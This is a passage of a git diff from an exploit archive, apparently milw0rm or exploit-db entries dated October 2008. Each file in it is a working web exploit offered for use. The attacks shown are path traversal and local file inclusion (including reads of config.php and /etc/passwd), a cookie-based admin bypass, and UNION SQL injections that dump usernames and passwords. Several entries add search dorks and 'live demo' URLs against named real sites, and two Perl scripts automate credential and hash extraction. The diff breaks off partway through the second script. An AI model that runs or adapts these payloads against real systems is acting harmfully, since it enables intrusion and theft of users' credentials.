-DATE   : 25 oct 2008
-SITE   : WwW.DeltaHacking.Net
-
-
-#####################################################
-
-APPLICATION : BuzzyWall
-DOWNLOAD    : http://rapidshare.com/files/155522383/BuzzyWall.v1.3.1.Nulled.zip
-VENDOR      : http://www.buzzywall.com
-
-#####################################################
-
-
-[+] vuln    : ./download.php
-
-               
-$file_name = $_GET['id']
-
-               $file_path = $weburl."wallpapers/full/".$file_name;
-
-                     .
-
-                     .
-
-                     .
-
-                     .
-
-               readfile("$file_path");
-
-   
-
-[+] Exploit : http://victim.com/download.php?id=../../config.php
-
-
-
-##############################################################################
-
-# Greetings: str0ke, Dr.Trojan, Cru3l.b0y and all member in DeltaHacking.Net #
-
-##############################################################################
-
-# milw0rm.com [2008-10-24]
+        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+        +                                                                    +
+        +        BuzzyWall Remote File Disclosure Vulnerability              +
+        +                                                                    +
+        +                     Discovered by b3hz4d                           +
+        +                                                                    +
+        +                     WwW.DeltaHacking.Net                           +
+        +                                                                    +
+        +                                                                    +
+        +                                                                    +
+        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+
+		
+AUTHOR : b3hz4d
+DATE   : 25 oct 2008
+SITE   : WwW.DeltaHacking.Net
+
+
+#####################################################
+
+APPLICATION : BuzzyWall
+DOWNLOAD    : http://rapidshare.com/files/155522383/BuzzyWall.v1.3.1.Nulled.zip
+VENDOR      : http://www.buzzywall.com
+
+#####################################################
+
+
+[+] vuln    : ./download.php
+
+               
+$file_name = $_GET['id']
+
+               $file_path = $weburl."wallpapers/full/".$file_name;
+
+                     .
+
+                     .
+
+                     .
+
+                     .
+
+               readfile("$file_path");
+
+   
+
+[+] Exploit : http://victim.com/download.php?id=../../config.php
+
+
+
+##############################################################################
+
+# Greetings: str0ke, Dr.Trojan, Cru3l.b0y and all member in DeltaHacking.Net #
+
+##############################################################################
+
+# milw0rm.com [2008-10-24]
diff --git a/platforms/php/webapps/6836.txt b/platforms/php/webapps/6836.txt
index f0eca8af7..619315dcf 100755
--- a/platforms/php/webapps/6836.txt
+++ b/platforms/php/webapps/6836.txt
@@ -1,14 +1,14 @@
-Tlnews 2.2 Admin Login Bypass (via Cookie)
-Found by X0r - EvolutionTeaM
-Email: evolutionteam.x0[at]gmail[dot]com
-
-Cms Download: http://www.easy-script.com/scripts-dl/tlnews-22.zip
-
-Exploit: javascript:document.cookie = "tlNews_login=admin; content=admin;
-path=/"
-
-Beby y0ur system g0t d0wn :P 
-
-// X0r - EvolutionTeaM
-
-# milw0rm.com [2008-10-25]
+Tlnews 2.2 Admin Login Bypass (via Cookie)
+Found by X0r - EvolutionTeaM
+Email: evolutionteam.x0[at]gmail[dot]com
+
+Cms Download: http://www.easy-script.com/scripts-dl/tlnews-22.zip
+
+Exploit: javascript:document.cookie = "tlNews_login=admin; content=admin;
+path=/"
+
+Beby y0ur system g0t d0wn :P 
+
+// X0r - EvolutionTeaM
+
+# milw0rm.com [2008-10-25]
diff --git a/platforms/php/webapps/6837.txt b/platforms/php/webapps/6837.txt
index 9d1198f09..b4f7bc8b4 100755
--- a/platforms/php/webapps/6837.txt
+++ b/platforms/php/webapps/6837.txt
@@ -1,46 +1,46 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-KasraCMS (index.php) Multiple Remote SQL Injection Vulnerabilities
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-[~] Script: KasraCMS
-[~] Language : PHP
-[~] WebSite: http://kasracms.com
-[~] affected File: index.php
-[~] Type : Commercial
-[~] Report-Date : 25/10/2008
-
-
---[ DoRK ]--
-intext:"2007-2008 Kasra ICT"
-
-
---[ Founder ]--
-G4N0K 
-
-
---[ Exploit ]--
-[~] http://localhost/[path]/index.php?shme=-63 UNION ALL SELECT
-0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user--
-[~] http://localhost/[path]/index.php?cont=-63 UNION ALL SELECT
-0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user--
-
-
---[ L!ve ]--
-http://kasracms.com/index.php?cont=-63 UNION ALL SELECT
-0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user--
-http://kasracms.com/index.php?shme=-63 UNION ALL SELECT
-0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user--
-
-
---[ Greetz ]--
-[~] ALLAH
-[~] Tornado2800 
-[~] Hussain-X 
-
-//ALLAH, forgimme...
-
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-EoX
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-# milw0rm.com [2008-10-25]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+KasraCMS (index.php) Multiple Remote SQL Injection Vulnerabilities
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+[~] Script: KasraCMS
+[~] Language : PHP
+[~] WebSite: http://kasracms.com
+[~] affected File: index.php
+[~] Type : Commercial
+[~] Report-Date : 25/10/2008
+
+
+--[ DoRK ]--
+intext:"2007-2008 Kasra ICT"
+
+
+--[ Founder ]--
+G4N0K 
+
+
+--[ Exploit ]--
+[~] http://localhost/[path]/index.php?shme=-63 UNION ALL SELECT
+0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user--
+[~] http://localhost/[path]/index.php?cont=-63 UNION ALL SELECT
+0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user--
+
+
+--[ L!ve ]--
+http://kasracms.com/index.php?cont=-63 UNION ALL SELECT
+0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user--
+http://kasracms.com/index.php?shme=-63 UNION ALL SELECT
+0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user--
+
+
+--[ Greetz ]--
+[~] ALLAH
+[~] Tornado2800 
+[~] Hussain-X 
+
+//ALLAH, forgimme...
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+EoX
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+# milw0rm.com [2008-10-25]
diff --git a/platforms/php/webapps/6839.txt b/platforms/php/webapps/6839.txt
index 5741d78e3..7cf1d8eee 100755
--- a/platforms/php/webapps/6839.txt
+++ b/platforms/php/webapps/6839.txt
@@ -1,43 +1,43 @@
-|___________________________________________________
-|
-| Classified Auctions (gotourl.php id) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|----------------  Hussin X  ------------------
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.IQ-ty.CoM
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|___________________________________________________
-|
-| script :  http://www.pozscripts.com/index.php
-|
-| DorK   : inurl:gotourl.php?id=
-|___________________________________________________
-
-Exploit:
-________
-
-
-www.[target].com/Script/gotourl.php?id=-30+union+select+concat(version(),user())--
-
-
-Demo:
-________
-
-http://www.singwebs.com/auction_demo/gotourl.php?id=-30+union+select+concat(version(),user())--
-
-
-
-________________( Greetz )_____________________
- _____   ____   __   __     _       ____  
-|_   _| |  _ \  \ \ / /    / \     / ___|
-  | |   | |_) |  \ V /    / _ \   | |  _
-  | |   |  _ <    | |    / ___ \  | |_| |
-  |_|   |_| \_\   |_|   /_/   \_\  \____|
-_______________________________________________
-
-# milw0rm.com [2008-10-26]
+|___________________________________________________
+|
+| Classified Auctions (gotourl.php id) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|----------------  Hussin X  ------------------
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.IQ-ty.CoM
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|___________________________________________________
+|
+| script :  http://www.pozscripts.com/index.php
+|
+| DorK   : inurl:gotourl.php?id=
+|___________________________________________________
+
+Exploit:
+________
+
+
+www.[target].com/Script/gotourl.php?id=-30+union+select+concat(version(),user())--
+
+
+Demo:
+________
+
+http://www.singwebs.com/auction_demo/gotourl.php?id=-30+union+select+concat(version(),user())--
+
+
+
+________________( Greetz )_____________________
+ _____   ____   __   __     _       ____  
+|_   _| |  _ \  \ \ / /    / \     / ___|
+  | |   | |_) |  \ V /    / _ \   | |  _
+  | |   |  _ <    | |    / ___ \  | |_| |
+  |_|   |_| \_\   |_|   /_/   \_\  \____|
+_______________________________________________
+
+# milw0rm.com [2008-10-26]
diff --git a/platforms/php/webapps/6842.txt b/platforms/php/webapps/6842.txt
index 5ec7abfce..b84f41fd2 100755
--- a/platforms/php/webapps/6842.txt
+++ b/platforms/php/webapps/6842.txt
@@ -1,29 +1,29 @@
--------------------------------------------------------------------
-WordPress Media Holder (id) Sql injetion vulnerability!
--------------------------------------------------------------------
--------------------------------------------------------------------
-Author: boom3rang
-Greetz: H!tM@N - KHG - chs - redc00de!
-Site   :  www.khg-crew.ws - [Kosova Hackers Group!]
--------------------------------------------------------------------
-
-
--------------------------------------------------------------------
-Dork:         mediaHolder.php?id
--------------------------------------------------------------------
-Exp:          http://localHost/mediaHolder.php?id=[exploit]
--------------------------------------------------------------------
-exploit:      -9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
--------------------------------------------------------------------
-liveDemo:
-http://www.dhadm.com/mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
--------------------------------------------------------------------
-
-
--------------------------------------------------------------------
-Proud 2 be Albanian
-Proud 2 be Muslim
-United States of Albania
--------------------------------------------------------------------
-
-# milw0rm.com [2008-10-26]
+-------------------------------------------------------------------
+WordPress Media Holder (id) Sql injetion vulnerability!
+-------------------------------------------------------------------
+-------------------------------------------------------------------
+Author: boom3rang
+Greetz: H!tM@N - KHG - chs - redc00de!
+Site   :  www.khg-crew.ws - [Kosova Hackers Group!]
+-------------------------------------------------------------------
+
+
+-------------------------------------------------------------------
+Dork:         mediaHolder.php?id
+-------------------------------------------------------------------
+Exp:          http://localHost/mediaHolder.php?id=[exploit]
+-------------------------------------------------------------------
+exploit:      -9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
+-------------------------------------------------------------------
+liveDemo:
+http://www.dhadm.com/mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
+-------------------------------------------------------------------
+
+
+-------------------------------------------------------------------
+Proud 2 be Albanian
+Proud 2 be Muslim
+United States of Albania
+-------------------------------------------------------------------
+
+# milw0rm.com [2008-10-26]
diff --git a/platforms/php/webapps/6843.txt b/platforms/php/webapps/6843.txt
index 1a206d26f..c3bcdff87 100755
--- a/platforms/php/webapps/6843.txt
+++ b/platforms/php/webapps/6843.txt
@@ -1,26 +1,25 @@
-
-==================================================================================
-      SFS Forum (forum.php id) Remote SQL Injection Vulnerability
-==================================================================================
-			   __  __           __          
-			   / / / /_  _______/ /__  __  __
-			  / /_/ / / / / ___/ / _ \/ / / /
-			 / __  / /_/ / /  / /  __/ /_/ / 
-			/_/ /_/\__,_/_/  /_/\___/\__, /  
-			                        /____/   
-==================================================================================
-----------------------------------------------------------------------------------
-Website script: http://www.scripts-for-sites.info/index.php
-----------------------------------------------------------------------------------
-Exploit:      http://localHost/forum/forum.php?forum=-9999+union+all+select+null,concat_ws(0x3a,password,username,%20email),null,null+from+users/*
-----------------------------------------------------------------------------------
-LiveDemo:
-http://www.turnkeyzone.com/demos/forum/forum.php?forum=-9999+union+all+select+null,concat_ws(0x3a,password,username,%20email),null,null+from+users/*
-----------------------------------------------------------------------------------
-
-==================================================================================
-Greetz      : Boom3rang
-Special Thx : Darckc0de
-==================================================================================
-
-# milw0rm.com [2008-10-26]
+==================================================================================
+      SFS Forum (forum.php id) Remote SQL Injection Vulnerability
+==================================================================================
+			   __  __           __          
+			   / / / /_  _______/ /__  __  __
+			  / /_/ / / / / ___/ / _ \/ / / /
+			 / __  / /_/ / /  / /  __/ /_/ / 
+			/_/ /_/\__,_/_/  /_/\___/\__, /  
+			                        /____/   
+==================================================================================
+----------------------------------------------------------------------------------
+Website script: http://www.scripts-for-sites.info/index.php
+----------------------------------------------------------------------------------
+Exploit:      http://localHost/forum/forum.php?forum=-9999+union+all+select+null,concat_ws(0x3a,password,username,%20email),null,null+from+users/*
+----------------------------------------------------------------------------------
+LiveDemo:
+http://www.turnkeyzone.com/demos/forum/forum.php?forum=-9999+union+all+select+null,concat_ws(0x3a,password,username,%20email),null,null+from+users/*
+----------------------------------------------------------------------------------
+
+==================================================================================
+Greetz      : Boom3rang
+Special Thx : Darckc0de
+==================================================================================
+
+# milw0rm.com [2008-10-26]
diff --git a/platforms/php/webapps/6844.pl b/platforms/php/webapps/6844.pl
index fb56ffc99..66a263cb1 100755
--- a/platforms/php/webapps/6844.pl
+++ b/platforms/php/webapps/6844.pl
@@ -1,58 +1,58 @@
-#!/usr/bin/perl
-
-#***********************************************************************************#
-# Remote SQL Injection Exploit                                                      #
-#***********************************************************************************#
-# Software : MyForum 1.3                                                            #
-# Download : http://www.easy-script.com/scripts-dl/myforumv1.3.zip                  #
-# Date     : 27 October 2008
-# Author   : Vrs-hCk                                                                #
-# Contact  : d00r[at]telkom[dot]net                                                 #
-#***********************************************************************************#
-# Greetz                                                                            #
-#***********************************************************************************#
-# MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org                    #
-# Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem, #
-# loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang,      #
-# chawanua, bL4Ck_3n91n3, R3V4N_B4ST4RD, bryan_ae1, dkk ... c0li.m0de.0n !!!        #
-#***********************************************************************************#
-
-use HTTP::Request;
-use LWP::UserAgent;
-
-$bug = "lecture.php?id=1";
-$sql = "+union+select+1,concat(0x21,pseudo,0x3a,mdp,0x21),3,4,5,6,7,8+from+forum_user+where+id=1--";
-
-print "\n ******************************************\n";
-print " *     MyForum 1.3 Remote SQL Exploit     *\n";
-print " *       For get Admin or User Login      *\n";
-print " *            Coded by Vrs-hCk            *\n";
-print " ******************************************\n\n";
-
-if (@ARGV != 1) { &help; exit(); }
-
-sub help(){
-	print " [?] Use : perl $0 www.target.com\n";
-	print "           perl $0 www.target.com/path\n\n";
-}
-
-if ($ARGV[0] =~ /http:\/\// ) { $target = $ARGV[0]."/"; } else { $target = "http://".$ARGV[0]."/"; }
-print " [SQL] Exploiting ...\n\n";
-
-my $injection = $target.$bug.$sql;
-my $request   = HTTP::Request->new(GET=>$injection);
-my $useragent = LWP::UserAgent->new();
-$useragent->timeout(10);
-my $response  = $useragent->request($request);
-if ($response->is_success) {
-	my $res   = $response->content;
-	if ($res =~ m/!(.*):(.*)!/g) {
-		my ($username,$passwd) = ($1,$2);
-		print " [target] $target \n";
-		print " [loginx] $username:$passwd \n\n";
-	}
-	else { print " [SQL] Error, Fail to get admin login.\n\n"; }
-}
-else { print " [SQL] Error, ".$response->status_line."\n\n"; }
-
-# milw0rm.com [2008-10-26]
+#!/usr/bin/perl
+
+#***********************************************************************************#
+# Remote SQL Injection Exploit                                                      #
+#***********************************************************************************#
+# Software : MyForum 1.3                                                            #
+# Download : http://www.easy-script.com/scripts-dl/myforumv1.3.zip                  #
+# Date     : 27 October 2008
+# Author   : Vrs-hCk                                                                #
+# Contact  : d00r[at]telkom[dot]net                                                 #
+#***********************************************************************************#
+# Greetz                                                                            #
+#***********************************************************************************#
+# MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org                    #
+# Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem, #
+# loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang,      #
+# chawanua, bL4Ck_3n91n3, R3V4N_B4ST4RD, bryan_ae1, dkk ... c0li.m0de.0n !!!        #
+#***********************************************************************************#
+
+use HTTP::Request;
+use LWP::UserAgent;
+
+$bug = "lecture.php?id=1";
+$sql = "+union+select+1,concat(0x21,pseudo,0x3a,mdp,0x21),3,4,5,6,7,8+from+forum_user+where+id=1--";
+
+print "\n ******************************************\n";
+print " *     MyForum 1.3 Remote SQL Exploit     *\n";
+print " *       For get Admin or User Login      *\n";
+print " *            Coded by Vrs-hCk            *\n";
+print " ******************************************\n\n";
+
+if (@ARGV != 1) { &help; exit(); }
+
+sub help(){
+	print " [?] Use : perl $0 www.target.com\n";
+	print "           perl $0 www.target.com/path\n\n";
+}
+
+if ($ARGV[0] =~ /http:\/\// ) { $target = $ARGV[0]."/"; } else { $target = "http://".$ARGV[0]."/"; }
+print " [SQL] Exploiting ...\n\n";
+
+my $injection = $target.$bug.$sql;
+my $request   = HTTP::Request->new(GET=>$injection);
+my $useragent = LWP::UserAgent->new();
+$useragent->timeout(10);
+my $response  = $useragent->request($request);
+if ($response->is_success) {
+	my $res   = $response->content;
+	if ($res =~ m/!(.*):(.*)!/g) {
+		my ($username,$passwd) = ($1,$2);
+		print " [target] $target \n";
+		print " [loginx] $username:$passwd \n\n";
+	}
+	else { print " [SQL] Error, Fail to get admin login.\n\n"; }
+}
+else { print " [SQL] Error, ".$response->status_line."\n\n"; }
+
+# milw0rm.com [2008-10-26]
diff --git a/platforms/php/webapps/6846.txt b/platforms/php/webapps/6846.txt
index b76da47aa..d78bef512 100755
--- a/platforms/php/webapps/6846.txt
+++ b/platforms/php/webapps/6846.txt
@@ -1,38 +1,38 @@
-[o]------------------------------------------------------------------------------------[x]
- |  Local File Inclusion Vulnerability                                                  |
-[o]------------------------------------------------------------------------------------[o]
- |  Software : MyForum 1.3                                                              |
- |  Download : http://www.easy-script.com/scripts-dl/myforumv1.3.zip                    |                                                    |
- |  Date     : 27 October 2008                                                          |
- |  Author   : Vrs-hCk                                                                  |
- |  Contact  : d00r[at]telkom[dot]net                                                   |
-[o]------------------------------------------------------------------------------------[o]
-
-[»] Vulnerable
-
-    ./admin/centre.php
-
-    3:  if (isset($padmin))
-    4:  {
-    5:
-    6:  $fichier = "padmin/".$padmin.".php";
-    7: 
-    8:  if (file_exists($fichier))
-    9:  {
-    10: include ($fichier); 
-    11: }
-
-[»] Exploit
-
-    http://[site]/[path]/admin/centre.php?padmin=[LFI]%00
-
-[o]------------------------------------------------------------------------------------[x]
- |  Greetz                                                                              |
-[o]------------------------------------------------------------------------------------[o]
- |  All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org        |
- |  Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem,   |
- |  loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang,        |
- |  chawanua, bl4Ck_3n91n3, R3V4N_B4ST4RD, dkk ... c0li.m0de.0n !!!                     |
-[o]------------------------------------------------------------------------------------[o]
-
-# milw0rm.com [2008-10-27]
+[o]------------------------------------------------------------------------------------[x]
+ |  Local File Inclusion Vulnerability                                                  |
+[o]------------------------------------------------------------------------------------[o]
+ |  Software : MyForum 1.3                                                              |
+ |  Download : http://www.easy-script.com/scripts-dl/myforumv1.3.zip                    |                                                    |
+ |  Date     : 27 October 2008                                                          |
+ |  Author   : Vrs-hCk                                                                  |
+ |  Contact  : d00r[at]telkom[dot]net                                                   |
+[o]------------------------------------------------------------------------------------[o]
+
+[»] Vulnerable
+
+    ./admin/centre.php
+
+    3:  if (isset($padmin))
+    4:  {
+    5:
+    6:  $fichier = "padmin/".$padmin.".php";
+    7: 
+    8:  if (file_exists($fichier))
+    9:  {
+    10: include ($fichier); 
+    11: }
+
+[»] Exploit
+
+    http://[site]/[path]/admin/centre.php?padmin=[LFI]%00
+
+[o]------------------------------------------------------------------------------------[x]
+ |  Greetz                                                                              |
+[o]------------------------------------------------------------------------------------[o]
+ |  All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org        |
+ |  Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem,   |
+ |  loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang,        |
+ |  chawanua, bl4Ck_3n91n3, R3V4N_B4ST4RD, dkk ... c0li.m0de.0n !!!                     |
+[o]------------------------------------------------------------------------------------[o]
+
+# milw0rm.com [2008-10-27]
diff --git a/platforms/php/webapps/6847.txt b/platforms/php/webapps/6847.txt
index 378a21d79..e5e200684 100755
--- a/platforms/php/webapps/6847.txt
+++ b/platforms/php/webapps/6847.txt
@@ -1,44 +1,44 @@
-########################## www.BugReport.ir #######################################
-#
-#        AmnPardaz Security Research Team
-#
-# Title:  Persia BME E-Catalogue SQL Injection Vulnerability
-# Vendor: http://www.persiabme.com/products/
-# Impact: High
-# Fix: N/A
-# Original Advisory: http://www.bugreport.ir/index_55.htm
-###################################################################################
-
-####################
-1. Description:
-####################
-    Persia BME E-Catalogue is a powerful engine which provides webmasters with advanced abilities of controlling their website. The system has a free style multi level Menu to add a company's products or services.
-
-####################
-2. Vulnerability:
-####################
-    Input passed to the "q" parameter in "search.aspx" is not properly sanitised before being used in SQL queries.
-This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
-Its possible to obtain user's plain text password by this vulnerability.
-
-
-
-####################
-3. Exploits/POCs:
-####################
-     http://www.example.com/fa/qsearch/search.asp?action=search&q=BugReport.ir' or 1=(select top 1 username+':'+password from tbluser)--
-
-####################
-4. Solution:
-####################
-    Edit the source code to ensure that inputs are properly sanitized.
-
-####################
-5. Credit:
-####################
-AmnPardaz Security Research & Penetration Testing Group
-Contact: admin[4t}bugreport{d0t]ir
-WwW.BugReport.ir
-WwW.AmnPardaz.com
-
-# milw0rm.com [2008-10-27]
+########################## www.BugReport.ir #######################################
+#
+#        AmnPardaz Security Research Team
+#
+# Title:  Persia BME E-Catalogue SQL Injection Vulnerability
+# Vendor: http://www.persiabme.com/products/
+# Impact: High
+# Fix: N/A
+# Original Advisory: http://www.bugreport.ir/index_55.htm
+###################################################################################
+
+####################
+1. Description:
+####################
+    Persia BME E-Catalogue is a powerful engine which provides webmasters with advanced abilities of controlling their website. The system has a free style multi level Menu to add a company's products or services.
+
+####################
+2. Vulnerability:
+####################
+    Input passed to the "q" parameter in "search.aspx" is not properly sanitised before being used in SQL queries.
+This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
+Its possible to obtain user's plain text password by this vulnerability.
+
+
+
+####################
+3. Exploits/POCs:
+####################
+     http://www.example.com/fa/qsearch/search.asp?action=search&q=BugReport.ir' or 1=(select top 1 username+':'+password from tbluser)--
+
+####################
+4. Solution:
+####################
+    Edit the source code to ensure that inputs are properly sanitized.
+
+####################
+5. Credit:
+####################
+AmnPardaz Security Research & Penetration Testing Group
+Contact: admin[4t}bugreport{d0t]ir
+WwW.BugReport.ir
+WwW.AmnPardaz.com
+
+# milw0rm.com [2008-10-27]
diff --git a/platforms/php/webapps/6849.txt b/platforms/php/webapps/6849.txt
index a44ff6faa..fafb9dd74 100755
--- a/platforms/php/webapps/6849.txt
+++ b/platforms/php/webapps/6849.txt
@@ -1,31 +1,31 @@
-#############################################################
-e107 Plugin alternate_profiles (newuser.php?id) Remote SQL-injetion Vulnerability
-#############################################################
-[~] Author boom3rang
---------------------------------
-[~] Site www.khg-crew.ws
---------------------------------
-[~] Greetz KHG & H!tm@N & chs & redc00de & proxy-ki11er  & Hurley
---------------------------------
-[!] Script Name: E107
-[!] Plugin Vuln: alternate_profiles/newuser.php?id=
-[!] Dork:  inurl:"/alternate_profiles/
-#############################################################
-
----------------------------------------------------------------------------------------------------
-[-] POC:
-http://localhost/e107_plugins/alternate_profiles/newuser.php?id=[exploit]
----------------------------------------------------------------------------------------------------
-[-] Exploit:
--9999+union+all+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+e107_user/*
----------------------------------------------------------------------------------------------------
-[-] LiveDemo:
-http://briefcaseit.com/e107_plugins/alternate_profiles/newuser.php?id=-9999+union+all+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+e107_user/*
----------------------------------------------------------------------------------------------------
-#########################################
-- United States of Albania
-- Proud to be Albanian
-- Proud to be Muslim
-#########################################
-
-# milw0rm.com [2008-10-27]
+#############################################################
+e107 Plugin alternate_profiles (newuser.php?id) Remote SQL-injetion Vulnerability
+#############################################################
+[~] Author boom3rang
+--------------------------------
+[~] Site www.khg-crew.ws
+--------------------------------
+[~] Greetz KHG & H!tm@N & chs & redc00de & proxy-ki11er  & Hurley
+--------------------------------
+[!] Script Name: E107
+[!] Plugin Vuln: alternate_profiles/newuser.php?id=
+[!] Dork:  inurl:"/alternate_profiles/
+#############################################################
+
+---------------------------------------------------------------------------------------------------
+[-] POC:
+http://localhost/e107_plugins/alternate_profiles/newuser.php?id=[exploit]
+---------------------------------------------------------------------------------------------------
+[-] Exploit:
+-9999+union+all+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+e107_user/*
+---------------------------------------------------------------------------------------------------
+[-] LiveDemo:
+http://briefcaseit.com/e107_plugins/alternate_profiles/newuser.php?id=-9999+union+all+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+e107_user/*
+---------------------------------------------------------------------------------------------------
+#########################################
+- United States of Albania
+- Proud to be Albanian
+- Proud to be Muslim
+#########################################
+
+# milw0rm.com [2008-10-27]
diff --git a/platforms/php/webapps/6850.txt b/platforms/php/webapps/6850.txt
index 718181478..ecf9fba03 100755
--- a/platforms/php/webapps/6850.txt
+++ b/platforms/php/webapps/6850.txt
@@ -1,28 +1,28 @@
-##############
-# Autor: x0r
-#
-# Email: evolutionteam.x0[at]gmail[dot]com
-#
-# Download: http://www.easy-script.com/scripts-dl/MyKtools-v2-4.zip
-#
-# Bug: LFI
-##############
-
-Bug:
-
-In \update.php
-
-// Include du fichier langue
-if ($_GET['langage'])
-{
-$langue = $_GET['langage'];
-include ("lang/".$langue.".php");
-}
-
-Exploit: \update.php?langage=../../../../../../etc/passwd%00
-
-p0wn3d Beby.
-
--=EOF=-
-
-# milw0rm.com [2008-10-27]
+##############
+# Autor: x0r
+#
+# Email: evolutionteam.x0[at]gmail[dot]com
+#
+# Download: http://www.easy-script.com/scripts-dl/MyKtools-v2-4.zip
+#
+# Bug: LFI
+##############
+
+Bug:
+
+In \update.php
+
+// Include du fichier langue
+if ($_GET['langage'])
+{
+$langue = $_GET['langage'];
+include ("lang/".$langue.".php");
+}
+
+Exploit: \update.php?langage=../../../../../../etc/passwd%00
+
+p0wn3d Beby.
+
+-=EOF=-
+
+# milw0rm.com [2008-10-27]
diff --git a/platforms/php/webapps/6852.pl b/platforms/php/webapps/6852.pl
index 06406ed6b..8f47f2c3f 100755
--- a/platforms/php/webapps/6852.pl
+++ b/platforms/php/webapps/6852.pl
@@ -1,50 +1,50 @@
-#!/usr/bin/perl
-# ------------------------------------------------------------
-# e107 (Plugin EasyShop) Remote Blind SQL Injection Exploit
-# By StAkeR[at]hotmail[dot]it  
-# Dork allinurl: e107_plugins/easyshop/easyshop.php
-# Example http://www.clan-designs.co.uk
-# easyshop/easyshop.php?choose_category=1&category_id= or 1=1
-# easyshop/easyshop.php?choose_category=1&category_id= and 1=2
-# ------------------------------------------------------------
-
-use strict;
-use warnings;
-use LWP::UserAgent;
-use URI::Escape;
-
-my ($request,$send,$ord,$hash,$uid) = (undef,undef,undef,undef,1);
-
-my $host = shift @ARGV or die "[?] Usage: perl $0 http://[host]\n";
-my @chars = (48..57, 97..102); 
-my $http = new LWP::UserAgent;
-
-for(0..32)
-{
-   foreach $ord(@chars) 
-   {
-      $send = " or ascii(substring((select user_password from e107_user where user_id=1),$uid,1))=$ord/*";
-      $send = uri_escape($send);
-    
-      $request = $http->get($host."/e107_plugins/easyshop/easyshop.php?choose_category=1&category_id=-1".$send);
-    
-     if($request->is_success and $request->content !~ /No products available/i)
-     {
-        $hash .= chr($ord); 
-        $uid++;
-     }
-   }
-}
-
-if(defined $hash)
-{
-   print STDOUT "[+] MD5: $hash\n";
-   exit;
-}
-else
-{
-   print STDOUT "[?] Exploit Failed!\n";
-   exit;
-}
-
-# milw0rm.com [2008-10-27]
+#!/usr/bin/perl
+# ------------------------------------------------------------
+# e107 (Plugin EasyShop) Remote Blind SQL Injection Exploit
+# By StAkeR[at]hotmail[dot]it  
+# Dork allinurl: e107_plugins/easyshop/easyshop.php
+# Example http://www.clan-designs.co.uk
+# easyshop/easyshop.php?choose_category=1&category_id= or 1=1
+# easyshop/easyshop.php?choose_category=1&category_id= and 1=2
+# ------------------------------------------------------------
+
